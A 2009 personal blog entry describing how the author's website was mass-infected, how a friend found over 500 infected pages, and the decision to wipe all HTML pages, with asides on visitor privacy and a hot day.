 |
Rick's b.log - entry 2009/06/28 |
 |
| ||||
mailto: blog -at- heyrick -dot- eu
You are not reading my b.log using HTTPS. You can switch to HTTPS by clicking here. 
 Use the player above to listen to the podcast version of this b.log entry, or click here to download it for listening to on the MP3 player of your choice.
However, when coming to do something about it, Google has many potential problems:
Now given the small numbers, we thought we could get on top of this problem. Google's webmaster tools turned out to be rather useless - it should have a way to access a listing of all pages it thinks are 'damaged', along with a brief reason why - even if in code form that you have to look up.
Why do I say this? We spent a week knowing the site had been compromised looking for ways to hunt down the offending pages. I fired up Minix3 in a virtual PC and swotted up on grep...
...but it wasn't until Ewen had a brainwave that the actual nature of the problem became clear.
Ewen decided to download a copy of the entire site, and to see how many warnings his antivirus threw up. Now I have no idea of how many actual pages are on my site - it is spread across three computers. The 'active' part of my site amounts to a little over 900 pages. I would guess about another hundred or so (?) on the RiscPC.
Ewen told me over 500 pages were infected.
If Google had revealed the true nature of the problem, we'd have taken the heavy-handed route earlier.
For those of you who don't know Unix commands - that is an instruction to recursively delete all of the HTML files on HeyRick. Every single web page - gone! The graphics, archives, and such will remain, but all the pages will be erased. If there is anything on the site that is not a part of the offline copies, it will be lost forever. Too bad.
There's a part of me that wants to think "oh well, that's what you get for using crap software", but there's a bigger part of me that has some modicum of responsibility. So users might be clueless and using insecure software. An awful lot of people don't have a clue when it comes to security. I know some people that heard a warning about computer viruses on TV and went out and bought an anti-spyware package from two years ago as it was on a special offer. I offered to install AVG, but as they were on dial-up they declined (consider how long many megabytes would take to download at 56kbps) and now use a computer on the internet with no antivirus whatsoever. Thankfully there is little important information on that machine, but that doesn't mean it's immune, or even remotely safe. I very much doubt they are alone.
So as a responsible netizen, it is my duty to do what I can to provide a safer web experience. Some people may have issue over parts of my site (expecially if they subscribe to the 'creationalist' theory), but this is a problem of freedom of thought. Things I say may compromise your beliefs (or vice versa? email me!), but there should be nothing on a website that will compromise your computer.
You will notice that I have a pretty lax attitude to tracking visitors. Some stuff (like Frobnicate) indirected to a php script to log how many downloads it gets so I can track popularity. Some stuff might ask for your email address if it is restricted release software. But for 99.9% of this site, I don't care who visits or how often. Cookies are not used. My own privacy policy warns you against accessing the site via frames or other wrappings unless as an automatic translation you yourself have requested. I don't need to know who you are, why should anybody else track you.
Staying in that situation, the risk of doing bad things to the computers of my visitors was too great. So I issued Ewen with the takedown order. It's all gone.
What you see is likely to be all that will be available until I get ADSL at home. Ewen has been doing some sterling work getting this mess sorted out, but I can't ask him to walk through every single page looking for broken links and missing content. That's something I will need to do myself.
If there is something missing that you would like made available - email me - I will take requests!
The IP address is located here in the region Hlavni mesto Praha (i.e. Prague) in the Czech Republic, and it was allocated on 2008/02/01. The BGP routing information is via "AS48974" registered to Masterforex Ltd. This may be the spoof "m-analytics"?
On the plus side, I was by no means alone - read http://www.theregister.co.uk/2009/05/30/mass_web_infection/.
You might be thinking, oooh, 35.1°, that's not so hot. Well, it is for around here! It's our current hottest. Well, no, I lie. In the time it took to process this picture, it has risen a tenth of a degree - to 35.2°C! The forecast? 29°C!
The time on the device is from radio-sync. The camera is running a little fast. I'll fix that now...
Please note that while I check this page every so often, I am not able to control what users write; therefore I disclaim all liability for unpleasant and/or infringing and/or defamatory material. Undesired content will be removed as soon as it is noticed. By leaving a comment, you agree not to post material that is illegal or in bad taste, and you should be aware that the time and your IP address are both recorded, should it be necessary to find out who you are. Oh, and don't bother trying to inline HTML. I'm not that stupid! ☺ ADDING COMMENTS DOES NOT WORK IF READING TRANSLATED VERSIONS.
Last read at 08:57 on 2024/04/19.
| |||||
| Next entry - 2009/07/03 Return to top of page |
| © 2009 Rick Murray |
| Retrieved from http://www.heyrick.co.uk/blog/index.php?diary=20090628 on 19th April 2024 |